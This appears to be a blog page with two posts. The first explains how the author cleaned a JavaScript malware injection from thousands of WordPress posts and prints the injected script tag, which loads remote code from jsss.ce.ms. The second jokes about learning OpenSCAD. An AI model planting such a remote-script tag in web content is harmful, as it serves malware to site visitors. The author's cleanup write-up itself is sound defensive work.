How to clean an “jsss.ce.ms” SQL injection

Well, that was exciting.  Apparently my website had been attached by some kind of SQL injection.  I was curious if my self-hosted WordPress website had been attacked like 4,300 others.  After some digging around, I found that this was not the case.  A scan by UnmaskParasites.com revealed nothing unusual.  However, a scan by Sucuri’s SiteCheck revealed some Javascript malware entries in some posts.

I say “some” posts.  By this I mean 3300 posts and post revisions dating back to the very first blog entry on this website going to as recently as July 13, 2011.  Not including this post, I’ve got 721 published blog entries – with almost all containing this little gem:

<script type=”text/javascript” src=”http://jsss.ce.ms/16″></script><script type=”text/javascript” src=”http://jsss.ce.ms/16″></script>

Here’s what I did to clean this infection:

  • Copy my entire “_posts”  to “_posts2”
  • Copy my entire “_posts” to “_posts3”
  • Downloaded “_posts3” as a CSV
  • Find and replace all instances of the above script in the CSV with “”
  • Deleted the contents of “_posts3”
  • Uploaded the altered CSV into “_posts3”
  • Renamed “_posts” to “_posts1” and “_posts3” to “_posts”
  • Done!

It’s definitely possible to create a little WordPress plugin to clean this kind of an infection out, but there’s little incentive to do so when the manual fix is relatively easy.  If you’ve got this kind of an infection in your site and don’t know how to take care of it, drop me a line.

The cake was a lie

So, I’m just learning OpenSCAD when Tony Buser leaves this comment:

This should be in the next version I believe, see: http://gitorious.org/openscad/openscad/commit/d479fca855688c92f4a9f72f4ec18d655c3b351d

Also, you can set variables on the command line like this:
http://en.wikibooks.org/wiki/OpenSCAD_User_Manual/Using_OpenSCAD_in_a_command_line_environment So you could set a variable to a random value in a shell script too.

Unfortunately, since variables aren’t really variable in openscad, it’s often easier to write code in another language that writes out openscad code. :(

Okay, what the hell.  “Variables aren’t really variables”?  What does that mean?  Yes, yes, OpenSCAD is written using a keyboard, but not really a keyboard.  T, are you just messing with me or what?  How the heck am I supposed to learn this language with this kind of nonsense?!

Amusingly, Tony is the second person to mention that sometimes it’s easier to use another language to write OpenSCAD.  Kidding aside, I kinda get that.  I use PHP to write custom javascript and MySQL all the time, since I sometimes have need for more dynamic-ness than those languages can accommodate. 1

  1. And, as we all know, I’m ever so dynamic []